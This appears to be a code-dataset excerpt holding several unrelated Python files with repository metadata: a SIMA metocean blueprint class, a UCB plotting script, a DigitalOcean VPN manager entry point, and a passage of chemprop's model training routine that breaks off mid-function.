# Generated with ExtremeValueBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | 50.55 | 121 | 0.739862 |
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | true | true |
f7102d6826665c4b3d3b3525445b2c5af3a15fd8 | 2,323 | py | Python | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | null | null | null | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | 1 | 2021-09-08T13:39:10.000Z | 2021-09-09T03:43:06.000Z | code/visualization/ucb.py | hust-cec-2021/ma2bea | 196f8de33cc4902bd9cb1fdd5400e41f9c275b55 | [
"MIT"
] | null | null | null | import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
def get_args():
    """Build the argument parser for this plot script and parse sys.argv."""
    parser = argparse.ArgumentParser()
    # Problem parameters: each entry is (flag, type, default).
    for flag, kind, default in (
        ('--seed', int, 1),
        ('--benchmark_id', int, 0),
        ('--rmp', float, 0.3),
    ):
        parser.add_argument(flag, type=kind, default=default)
    return parser.parse_args()
ROOT = '../../result'
def load(args):
    """Load every saved UCB array (files containing 'ucb') for one run."""
    run_dir = os.path.join(ROOT, '{}/{}_{}'.format(args.benchmark_id, args.algorithm, args.rmp))
    # Collect the arrays in directory-listing order, matching by file name.
    ucb_arrays = [
        np.load(os.path.join(run_dir, entry))
        for entry in os.listdir(run_dir)
        if 'ucb' in entry
    ]
    return np.array(ucb_arrays)
def get_label(args):
    """Return the ``<algorithm>_<benchmark id>`` label used for plots."""
    return f'{args.algorithm}_{args.benchmark_id}'
def plot(Fitness, args):
    """Plot the mean UCB curve from task ``args.source`` to every other task.

    ``Fitness`` holds UCB values per run; runs are averaged over axis 0.
    """
    # Per-source line colours; the 'r' entries highlight specific
    # source->target pairs of interest.
    cs = [
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['r', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'r', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'r', 'r', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'r', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
    ]
    # NOTE(review): `label` is computed but never used below -- verify.
    label = get_label(args)
    # Keep only the UCB values whose source task is args.source.
    Fitness = Fitness[:, :, args.source]
    # Average over the independent runs (axis 0).
    mean_fitness = np.mean(Fitness, axis=0)
    # i indexes the colour row: it advances only for plotted (non-source)
    # targets, keeping it within the 9 colour entries.
    i = 0
    for target in range(mean_fitness.shape[1]):
        if target != args.source:
            plt.plot(mean_fitness[:, target], label='T{}'.format(target+1), color=cs[args.source][i], linewidth=0.3)
            # NOTE(review): re-set on every iteration; could be hoisted.
            plt.ylabel('UCB value')
            i += 1
def main():
    """Plot UCB curves for each of the 10 source tasks and save the figures."""
    # get args
    args = get_args()
    # plot each algorithm
    args.algorithm = 'MTO'
    Fitness = load(args)
    for source in range(10):
        args.source = source
        plot(Fitness, args)
        plt.legend()
        plt.ylim((0, 2))
        # Save one figure per source task, in both EPS and PNG.
        plt.savefig('plot/ucb/{}.eps'.format(source + 1), dpi=300)
        plt.savefig('plot/ucb/{}.png'.format(source + 1), dpi=300)
        # Reset the figure state before plotting the next source.
        plt.clf()
        plt.cla()
if __name__ == '__main__':
    main()
| 29.782051 | 116 | 0.494189 | import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
def get_args():
    """Parse the command-line arguments for this plotting script."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--benchmark_id', type=int, default=0)
    parser.add_argument('--rmp', type=float, default=0.3)
    args = parser.parse_args()
    return args
# Base directory holding the saved experiment results.
ROOT = '../../result'
def load(args):
    """Load every saved UCB array (files containing 'ucb') for one run."""
    folder = os.path.join(ROOT, '{}/{}_{}'.format(args.benchmark_id, args.algorithm, args.rmp))
    Fitness = []
    for name in os.listdir(folder):
        path = os.path.join(folder, name)
        if 'ucb' in name:
            y = np.load(path)
            Fitness.append(y)
    return np.array(Fitness)
def get_label(args):
    """Return the ``<algorithm>_<benchmark id>`` plot label."""
    return '{}_{}'.format(args.algorithm, args.benchmark_id)
def plot(Fitness, args):
    """Plot the mean UCB curve from task ``args.source`` to every other task."""
    # Per-source line colours; 'r' highlights specific pairs of interest.
    cs = [
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['r', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'r', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'r', 'r', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'r', 'b', 'b', 'b', 'b', 'b'],
        ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'b'],
    ]
    # NOTE(review): `label` is unused below -- verify.
    label = get_label(args)
    # Keep the args.source slice and average over the runs (axis 0).
    Fitness = Fitness[:, :, args.source]
    mean_fitness = np.mean(Fitness, axis=0)
    i = 0
    for target in range(mean_fitness.shape[1]):
        if target != args.source:
            plt.plot(mean_fitness[:, target], label='T{}'.format(target+1), color=cs[args.source][i], linewidth=0.3)
            plt.ylabel('UCB value')
            i += 1
def main():
    """Plot UCB curves for each of the 10 source tasks and save the figures."""
    args = get_args()
    args.algorithm = 'MTO'
    Fitness = load(args)
    for source in range(10):
        args.source = source
        plot(Fitness, args)
        plt.legend()
        plt.ylim((0, 2))
        # One figure per source task, saved as EPS and PNG.
        plt.savefig('plot/ucb/{}.eps'.format(source + 1), dpi=300)
        plt.savefig('plot/ucb/{}.png'.format(source + 1), dpi=300)
        plt.clf()
        plt.cla()
if __name__ == '__main__':
main()
| true | true |
f7102d81b029f475ab955aea8189e37c558f7827 | 2,229 | py | Python | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | dovpn.py | dhminch/dovpn | bcd35679d33608f243ceef23b8581c56cfe59dd8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Main function for the DOVPN project."""
import argparse
import logging
import os
import yaml
import vpnorchestrator
def main():
    """Main function that sets up the script to run.

    Handles arguments, logging, and configuration before passing off
    control to the orchestrator object."""
    parser = argparse.ArgumentParser(description='Manage a DigitalOcean VPN.')
    parser.add_argument('-c', '--config', default="config.yaml",
                        help='configuration file location')
    parser.add_argument('-r', '--remove', action='store_true',
                        help='remove all related DigitalOcean droplets and keys, and quit')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help="enable verbose output")
    parser.add_argument('-d', '--debug', action='store_true',
                        help="enable verbose output with HTTP requests (implies -v)")
    args = parser.parse_args()

    log_format = "%(asctime)s %(levelname)8s: %(message)s"
    if args.debug:
        # Also trace the raw HTTP requests made to the DigitalOcean API.
        import http.client as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    elif args.verbose:
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    else:
        logging.basicConfig(format=log_format, level=logging.INFO)

    # Root is required (the script manages local VPN networking).
    if os.geteuid() != 0:
        logging.critical("You are not root!")
        exit(1)

    if not os.path.isfile(args.config):
        logging.critical("Config file {} does not exist.".format(args.config))
        exit(1)

    logging.info("Loading configuration file {}".format(args.config))
    with open(args.config, "r") as config_file:
        config_yaml = yaml.load(config_file, Loader=yaml.FullLoader)

    if args.remove:
        logging.info("Removing all DigitalOcean droplets and keys")
        orch = vpnorchestrator.VpnOrchestrator(config_yaml)
        orch.clean()
        exit(0)

    # BUGFIX: construct the orchestrator *before* the try block.  Previously
    # a failing constructor left `orch` unbound and the except handler died
    # with NameError, masking the real error; the handler also re-raised with
    # `raise ex`, resetting the traceback.  try/finally runs teardown exactly
    # once on both success and failure and preserves the original traceback.
    orch = vpnorchestrator.VpnOrchestrator(config_yaml)
    try:
        orch.start()
        orch.wait()
    finally:
        orch.teardown()
if __name__ == "__main__":
main() | 33.268657 | 91 | 0.645581 |
import argparse
import logging
import os
import yaml
import vpnorchestrator
def main():
    """Parse arguments, configure logging, load config and run the orchestrator."""
    parser = argparse.ArgumentParser(description='Manage a DigitalOcean VPN.')
    parser.add_argument('-c', '--config', default="config.yaml",
                        help='configuration file location')
    parser.add_argument('-r', '--remove', action='store_true',
                        help='remove all related DigitalOcean droplets and keys, and quit')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help="enable verbose output")
    parser.add_argument('-d', '--debug', action='store_true',
                        help="enable verbose output with HTTP requests (implies -v)")
    args = parser.parse_args()
    log_format = "%(asctime)s %(levelname)8s: %(message)s"
    if args.debug:
        # Also trace the raw HTTP requests.
        import http.client as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    elif args.verbose:
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    else:
        logging.basicConfig(format=log_format, level=logging.INFO)
    # Root is required for the VPN management this script performs.
    if os.geteuid() != 0:
        logging.critical("You are not root!")
        exit(1)
    if not os.path.isfile(args.config):
        logging.critical("Config file {} does not exist.".format(args.config))
        exit(1)
    logging.info("Loading configuration file {}".format(args.config))
    with open(args.config, "r") as config_file:
        config_yaml = yaml.load(config_file, Loader=yaml.FullLoader)
    if args.remove:
        logging.info("Removing all DigitalOcean droplets and keys")
        orch = vpnorchestrator.VpnOrchestrator(config_yaml)
        orch.clean()
        exit(0)
    # NOTE(review): if the constructor raises, `orch` is unbound and the
    # except handler raises NameError, masking the real error; `raise ex`
    # also resets the traceback (bare `raise` would preserve it) -- verify.
    try:
        orch = vpnorchestrator.VpnOrchestrator(config_yaml)
        orch.start()
        orch.wait()
        orch.teardown()
    except Exception as ex:
        orch.teardown()
        raise ex
if __name__ == "__main__":
main() | true | true |
f7102ec5b68677844155001f87b3bfc7105cb084 | 12,274 | py | Python | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | null | null | null | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | null | null | null | chemprop/train/run_training.py | allisontam/chemprop | 87ac151c68d8a200d564b064103c4f514e29f6bd | [
"MIT"
] | 1 | 2020-04-02T13:10:34.000Z | 2020-04-02T13:10:34.000Z | from argparse import Namespace
import csv
from logging import Logger
import os
from pprint import pformat
from typing import List
import numpy as np
from tensorboardX import SummaryWriter
import torch
from tqdm import trange
import pickle
from torch.optim.lr_scheduler import ExponentialLR
from .evaluate import evaluate, evaluate_predictions
from .predict import predict, save_predictions
from .train import train
from chemprop.data import StandardScaler
from chemprop.data.utils import flip_data, get_class_sizes, get_data, get_task_names, split_data, split_loocv
from chemprop.models import build_model
from chemprop.nn_utils import param_count
from chemprop.utils import build_optimizer, build_lr_scheduler, get_loss_func, get_metric_func, load_checkpoint,\
makedirs, save_checkpoint
def run_training(args: Namespace, logger: Logger = None) -> List[float]:
    """
    Trains a model and returns test scores on the model checkpoint with the highest validation score.

    :param args: Arguments.
    :param logger: Logger.
    :return: A list of ensemble scores for each task.
    """
    if logger is not None:
        debug, info = logger.debug, logger.info
    else:
        debug = info = print

    # Set GPU
    if args.gpu is not None:
        torch.cuda.set_device(args.gpu)

    # Print args
    debug(pformat(vars(args)))

    # Get data
    debug('Loading data')
    args.task_names = get_task_names(args.data_path, args.data_format)
    data = get_data(path=args.data_path, args=args, logger=logger)
    args.num_tasks = data.num_tasks()
    args.features_size = data.features_size()
    debug(f'Number of tasks = {args.num_tasks}')

    # Split data
    debug(f'Splitting data with seed {args.seed}')
    if args.separate_test_path:
        test_data = get_data(path=args.separate_test_path, args=args, features_path=args.separate_test_features_path, logger=logger)
    if args.separate_val_path:
        val_data = get_data(path=args.separate_val_path, args=args, features_path=args.separate_val_features_path, logger=logger)

    if args.separate_val_path and args.separate_test_path:
        train_data = data
    elif args.separate_val_path:
        train_data, _, test_data = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.0, 0.2), seed=args.seed, args=args, logger=logger)
    elif args.separate_test_path:
        train_data, val_data, _ = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.2, 0.0), seed=args.seed, args=args, logger=logger)
    elif args.split_type == 'loocv':
        train_data, val_data, test_data = split_loocv(data=data, args=args, logger=logger)
    else:
        train_data, val_data, test_data = split_data(data=data, split_type=args.split_type, sizes=args.split_sizes, seed=args.seed, args=args, logger=logger)

    if args.dataset_type == 'classification':
        class_sizes = get_class_sizes(test_data)
        debug('Class sizes in test set')
        for i, task_class_sizes in enumerate(class_sizes):
            debug(f'{args.task_names[i]} '
                  f'{", ".join(f"{cls}: {size * 100:.2f}%" for cls, size in enumerate(task_class_sizes))}')
            if not args.train_all and task_class_sizes == 0:  # TODO: only works for just 1 property prediction task
                debug('Moved to next epoch due to homogenous targets in test set.')
                return [float('nan')]

    if args.save_smiles_splits:
        # Record which input rows ended up in each split, keyed by the
        # (drug smiles, compound smiles) pair in the first two columns.
        with open(args.data_path, 'r') as f:
            reader = csv.reader(f)
            header = next(reader)

            lines_by_smiles = {}
            indices_by_smiles = {}
            for i, line in enumerate(reader):
                smiles = (line[0], line[1])
                lines_by_smiles[smiles] = line
                indices_by_smiles[smiles] = i

        all_split_indices = []
        for dataset, name in [(train_data, 'train'), (val_data, 'val'), (test_data, 'test')]:
            with open(os.path.join(args.save_dir, name + '_smiles.csv'), 'w') as f:
                writer = csv.writer(f)
                writer.writerow(['smiles'])
                for smiles in dataset.smiles():
                    writer.writerow([smiles])
            with open(os.path.join(args.save_dir, name + '_full.csv'), 'w') as f:
                writer = csv.writer(f)
                writer.writerow(header)
                for smiles in dataset.smiles():
                    writer.writerow(lines_by_smiles[smiles])
            split_indices = []
            for smiles in dataset.smiles():
                split_indices.append(indices_by_smiles[smiles])
            split_indices = sorted(split_indices)
            all_split_indices.append(split_indices)
        with open(os.path.join(args.save_dir, 'split_indices.pckl'), 'wb') as f:
            pickle.dump(all_split_indices, f)

    if args.symmetric:
        train_data = flip_data(train_data)

    if args.features_scaling:
        drug_scaler, cmpd_scaler = train_data.normalize_features(replace_nan_token=0)
        val_data.normalize_features(drug_scaler, cmpd_scaler)
        test_data.normalize_features(drug_scaler, cmpd_scaler)
    else:
        drug_scaler, cmpd_scaler = None, None

    args.train_data_size = len(train_data)

    debug(f'Total size = {len(data):,} | '
          f'train size = {len(train_data):,} | val size = {len(val_data):,} | test size = {len(test_data):,}')

    # Initialize scaler and scale training targets by subtracting mean and dividing standard deviation (regression only)
    if args.dataset_type == 'regression':
        debug('Fitting scaler')
        train_smiles, train_targets = train_data.smiles(), train_data.targets()
        scaler = StandardScaler().fit(train_targets)
        scaled_targets = scaler.transform(train_targets).tolist()
        train_data.set_targets(scaled_targets)
    else:
        scaler = None

    # Get loss and metric functions
    loss_func = get_loss_func(args)
    metric_func = get_metric_func(metric=args.metric)

    # Set up test set evaluation
    test_smiles, test_targets = test_data.smiles(), test_data.targets()
    if args.dataset_type == 'multiclass':
        sum_test_preds = np.zeros((len(test_smiles), args.num_tasks, args.multiclass_num_classes))
    else:
        sum_test_preds = np.zeros((len(test_smiles), args.num_tasks))

    # Train ensemble of models
    for model_idx in range(args.ensemble_size):
        # Tensorboard writer
        save_dir = os.path.join(args.save_dir, f'model_{model_idx}')
        makedirs(save_dir)
        try:
            writer = SummaryWriter(log_dir=save_dir)
        # BUGFIX: narrow the bare `except:` (it also swallowed SystemExit and
        # KeyboardInterrupt); the fallback is for older tensorboardX versions
        # whose constructor takes `logdir` instead of `log_dir`.
        except Exception:
            writer = SummaryWriter(logdir=save_dir)

        # Load/build model
        if args.checkpoint_paths is not None:
            debug(f'Loading model {model_idx} from {args.checkpoint_paths[model_idx]}')
            model = load_checkpoint(args.checkpoint_paths[model_idx], current_args=args, logger=logger)
        else:
            debug(f'Building model {model_idx}')
            model = build_model(args)

        debug(model)
        debug(f'Number of parameters = {param_count(model):,}')
        if args.cuda:
            debug('Moving model to cuda')
            model = model.cuda()

        # Ensure that model is saved in correct location for evaluation if 0 epochs
        save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)

        # Optimizers
        optimizer = build_optimizer(model, args)

        # Learning rate schedulers
        scheduler = build_lr_scheduler(optimizer, args)

        # Run training
        best_score = float('inf') if args.minimize_score else -float('inf')
        best_epoch, n_iter = 0, 0
        for epoch in trange(args.epochs):
            debug(f'Epoch {epoch}')

            n_iter = train(
                model=model,
                data=train_data,
                loss_func=loss_func,
                optimizer=optimizer,
                scheduler=scheduler,
                args=args,
                n_iter=n_iter,
                logger=logger,
                writer=writer
            )
            if isinstance(scheduler, ExponentialLR):
                scheduler.step()
            val_scores, val_loss = evaluate(
                model=model,
                data=val_data,
                loss_func=loss_func,
                num_tasks=args.num_tasks,
                metric_func=metric_func,
                batch_size=args.batch_size,
                dataset_type=args.dataset_type,
                scaler=scaler,
                logger=logger
            )

            # Average validation score
            avg_val_score = np.nanmean(val_scores)
            debug(f'Validation {args.metric} = {avg_val_score:.6f}')
            writer.add_scalar(f'validation_{args.metric}', avg_val_score, n_iter)
            debug(f'Validation loss = {val_loss:.6f}')
            writer.add_scalar('validation_loss', val_loss, n_iter)

            if args.show_individual_scores:
                # Individual validation scores
                for task_name, val_score in zip(args.task_names, val_scores):
                    debug(f'Validation {task_name} {args.metric} = {val_score:.6f}')
                    writer.add_scalar(f'validation_{task_name}_{args.metric}', val_score, n_iter)

            # Save model checkpoint if improved validation score
            if args.minimize_score and avg_val_score < best_score or \
                    not args.minimize_score and avg_val_score > best_score:
                best_score, best_epoch = avg_val_score, epoch
                save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)

        # Evaluate on test set using model with best validation score
        info(f'Model {model_idx} best validation {args.metric} = {best_score:.6f} on epoch {best_epoch}')
        model = load_checkpoint(os.path.join(save_dir, 'model.pt'), cuda=args.cuda, logger=logger)

        test_preds = predict(
            model=model,
            data=test_data,
            batch_size=args.batch_size,
            scaler=scaler
        )
        if args.save_preds:
            val_preds = predict(model=model, data=val_data, batch_size=args.batch_size, scaler=scaler)
            train_preds = predict(model=model, data=train_data, batch_size=args.batch_size, scaler=scaler)
            save_predictions(save_dir, train_data, val_data, test_data,
                             train_preds, val_preds, test_preds, args.task_names, scaler)

        test_scores = evaluate_predictions(
            preds=test_preds,
            targets=test_targets,
            num_tasks=args.num_tasks,
            metric_func=metric_func,
            dataset_type=args.dataset_type,
            logger=logger
        )

        if len(test_preds) != 0:
            sum_test_preds += np.array(test_preds)

        # Average test score
        avg_test_score = np.nanmean(test_scores)
        info(f'Model {model_idx} test {args.metric} = {avg_test_score:.6f}')
        writer.add_scalar(f'test_{args.metric}', avg_test_score, 0)

        if args.show_individual_scores:
            # Individual test scores
            for task_name, test_score in zip(args.task_names, test_scores):
                info(f'Model {model_idx} test {task_name} {args.metric} = {test_score:.6f}')
                writer.add_scalar(f'test_{task_name}_{args.metric}', test_score, n_iter)

    # Evaluate ensemble on test set
    avg_test_preds = (sum_test_preds / args.ensemble_size).tolist()

    ensemble_scores = evaluate_predictions(
        preds=avg_test_preds,
        targets=test_targets,
        num_tasks=args.num_tasks,
        metric_func=metric_func,
        dataset_type=args.dataset_type,
        logger=logger
    )

    # Average ensemble score
    avg_ensemble_test_score = np.nanmean(ensemble_scores)
    info(f'Ensemble test {args.metric} = {avg_ensemble_test_score:.6f}')
    # NOTE(review): `writer` here is the last model's writer from the loop
    # above; with ensemble_size == 0 it would be unbound -- verify.
    writer.add_scalar(f'ensemble_test_{args.metric}', avg_ensemble_test_score, 0)

    # Individual ensemble scores
    if args.show_individual_scores:
        for task_name, ensemble_score in zip(args.task_names, ensemble_scores):
            info(f'Ensemble test {task_name} {args.metric} = {ensemble_score:.6f}')

    return ensemble_scores
| 41.60678 | 157 | 0.644533 | from argparse import Namespace
import csv
from logging import Logger
import os
from pprint import pformat
from typing import List
import numpy as np
from tensorboardX import SummaryWriter
import torch
from tqdm import trange
import pickle
from torch.optim.lr_scheduler import ExponentialLR
from .evaluate import evaluate, evaluate_predictions
from .predict import predict, save_predictions
from .train import train
from chemprop.data import StandardScaler
from chemprop.data.utils import flip_data, get_class_sizes, get_data, get_task_names, split_data, split_loocv
from chemprop.models import build_model
from chemprop.nn_utils import param_count
from chemprop.utils import build_optimizer, build_lr_scheduler, get_loss_func, get_metric_func, load_checkpoint,\
makedirs, save_checkpoint
def run_training(args: Namespace, logger: Logger = None) -> List[float]:
    """Train a model (or ensemble of models) and evaluate on the test set.

    Loads and splits the data, optionally normalizes features/targets, trains
    ``args.ensemble_size`` models (best-on-validation checkpointing), evaluates
    each member on the test split, then scores the averaged ensemble predictions.

    :param args: Parsed chemprop training arguments (Namespace).
    :param logger: Optional logger; falls back to ``print`` for debug/info.
    :return: Per-task test scores of the prediction ensemble.
    """
    # Route log output through the logger when available.
    if logger is not None:
        debug, info = logger.debug, logger.info
    else:
        debug = info = print
    # Pin the CUDA device before any tensors are created.
    if args.gpu is not None:
        torch.cuda.set_device(args.gpu)
    debug(pformat(vars(args)))
    # ---- Data loading ----
    debug('Loading data')
    args.task_names = get_task_names(args.data_path, args.data_format)
    data = get_data(path=args.data_path, args=args, logger=logger)
    args.num_tasks = data.num_tasks()
    args.features_size = data.features_size()
    debug(f'Number of tasks = {args.num_tasks}')
    # ---- Train/val/test split ----
    # Separate val/test files take precedence over an automatic split.
    debug(f'Splitting data with seed {args.seed}')
    if args.separate_test_path:
        test_data = get_data(path=args.separate_test_path, args=args, features_path=args.separate_test_features_path, logger=logger)
    if args.separate_val_path:
        val_data = get_data(path=args.separate_val_path, args=args, features_path=args.separate_val_features_path, logger=logger)
    if args.separate_val_path and args.separate_test_path:
        train_data = data
    elif args.separate_val_path:
        train_data, _, test_data = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.0, 0.2), seed=args.seed, args=args, logger=logger)
    elif args.separate_test_path:
        train_data, val_data, _ = split_data(data=data, split_type=args.split_type, sizes=(0.8, 0.2, 0.0), seed=args.seed, args=args, logger=logger)
    elif args.split_type == 'loocv':
        train_data, val_data, test_data = split_loocv(data=data, args=args, logger=logger)
    else:
        train_data, val_data, test_data = split_data(data=data, split_type=args.split_type, sizes=args.split_sizes, seed=args.seed, args=args, logger=logger)
    if args.dataset_type == 'classification':
        class_sizes = get_class_sizes(test_data)
        debug('Class sizes in test set')
        for i, task_class_sizes in enumerate(class_sizes):
            debug(f'{args.task_names[i]} '
                  f'{", ".join(f"{cls}: {size * 100:.2f}%" for cls, size in enumerate(task_class_sizes))}')
            # Abort early when a test task is homogeneous (score would be undefined).
            if not args.train_all and task_class_sizes == 0:
                debug('Moved to next epoch due to homogenous targets in test set.')
                return [float('nan')]
    # ---- Optionally persist the exact split (smiles lists + row indices) ----
    if args.save_smiles_splits:
        with open(args.data_path, 'r') as f:
            reader = csv.reader(f)
            header = next(reader)
            lines_by_smiles = {}
            indices_by_smiles = {}
            for i, line in enumerate(reader):
                # NOTE(review): assumes the first two columns identify the pair — confirm with data format.
                smiles = (line[0], line[1])
                lines_by_smiles[smiles] = line
                indices_by_smiles[smiles] = i
        all_split_indices = []
        for dataset, name in [(train_data, 'train'), (val_data, 'val'), (test_data, 'test')]:
            with open(os.path.join(args.save_dir, name + '_smiles.csv'), 'w') as f:
                writer = csv.writer(f)
                writer.writerow(['smiles'])
                for smiles in dataset.smiles():
                    writer.writerow([smiles])
            with open(os.path.join(args.save_dir, name + '_full.csv'), 'w') as f:
                writer = csv.writer(f)
                writer.writerow(header)
                for smiles in dataset.smiles():
                    writer.writerow(lines_by_smiles[smiles])
            split_indices = []
            for smiles in dataset.smiles():
                split_indices.append(indices_by_smiles[smiles])
            split_indices = sorted(split_indices)
            all_split_indices.append(split_indices)
        with open(os.path.join(args.save_dir, 'split_indices.pckl'), 'wb') as f:
            pickle.dump(all_split_indices, f)
    # Augment training data with flipped pairs for symmetric tasks.
    if args.symmetric:
        train_data = flip_data(train_data)
    # ---- Feature normalization (scalers fit on train only) ----
    if args.features_scaling:
        drug_scaler, cmpd_scaler = train_data.normalize_features(replace_nan_token=0)
        val_data.normalize_features(drug_scaler, cmpd_scaler)
        test_data.normalize_features(drug_scaler, cmpd_scaler)
    else:
        drug_scaler, cmpd_scaler = None, None
    args.train_data_size = len(train_data)
    debug(f'Total size = {len(data):,} | '
          f'train size = {len(train_data):,} | val size = {len(val_data):,} | test size = {len(test_data):,}')
    # For regression, train on standardized targets; predictions are
    # inverse-transformed later with the same scaler.
    if args.dataset_type == 'regression':
        debug('Fitting scaler')
        train_smiles, train_targets = train_data.smiles(), train_data.targets()
        scaler = StandardScaler().fit(train_targets)
        scaled_targets = scaler.transform(train_targets).tolist()
        train_data.set_targets(scaled_targets)
    else:
        scaler = None
    # ---- Loss / metric setup ----
    loss_func = get_loss_func(args)
    metric_func = get_metric_func(metric=args.metric)
    # Accumulates each member's test predictions for ensemble averaging.
    test_smiles, test_targets = test_data.smiles(), test_data.targets()
    if args.dataset_type == 'multiclass':
        sum_test_preds = np.zeros((len(test_smiles), args.num_tasks, args.multiclass_num_classes))
    else:
        sum_test_preds = np.zeros((len(test_smiles), args.num_tasks))
    # ---- Train each ensemble member ----
    for model_idx in range(args.ensemble_size):
        save_dir = os.path.join(args.save_dir, f'model_{model_idx}')
        makedirs(save_dir)
        # tensorboardX renamed the kwarg across versions (log_dir vs logdir).
        try:
            writer = SummaryWriter(log_dir=save_dir)
        except:
            writer = SummaryWriter(logdir=save_dir)
        if args.checkpoint_paths is not None:
            debug(f'Loading model {model_idx} from {args.checkpoint_paths[model_idx]}')
            model = load_checkpoint(args.checkpoint_paths[model_idx], current_args=args, logger=logger)
        else:
            debug(f'Building model {model_idx}')
            model = build_model(args)
        debug(model)
        debug(f'Number of parameters = {param_count(model):,}')
        if args.cuda:
            debug('Moving model to cuda')
            model = model.cuda()
        # Save an initial checkpoint so a "best" model always exists on disk.
        save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
        optimizer = build_optimizer(model, args)
        scheduler = build_lr_scheduler(optimizer, args)
        # ---- Epoch loop with best-on-validation checkpointing ----
        best_score = float('inf') if args.minimize_score else -float('inf')
        best_epoch, n_iter = 0, 0
        for epoch in trange(args.epochs):
            debug(f'Epoch {epoch}')
            n_iter = train(
                model=model,
                data=train_data,
                loss_func=loss_func,
                optimizer=optimizer,
                scheduler=scheduler,
                args=args,
                n_iter=n_iter,
                logger=logger,
                writer=writer
            )
            if isinstance(scheduler, ExponentialLR):
                scheduler.step()
            val_scores, val_loss = evaluate(
                model=model,
                data=val_data,
                loss_func=loss_func,
                num_tasks=args.num_tasks,
                metric_func=metric_func,
                batch_size=args.batch_size,
                dataset_type=args.dataset_type,
                scaler=scaler,
                logger=logger
            )
            # Average validation score across tasks (NaN-safe).
            avg_val_score = np.nanmean(val_scores)
            debug(f'Validation {args.metric} = {avg_val_score:.6f}')
            writer.add_scalar(f'validation_{args.metric}', avg_val_score, n_iter)
            debug(f'Validation loss = {val_loss:.6f}')
            writer.add_scalar(f'validation_loss', val_loss, n_iter)
            if args.show_individual_scores:
                for task_name, val_score in zip(args.task_names, val_scores):
                    debug(f'Validation {task_name} {args.metric} = {val_score:.6f}')
                    writer.add_scalar(f'validation_{task_name}_{args.metric}', val_score, n_iter)
            # Keep only the checkpoint with the best validation score.
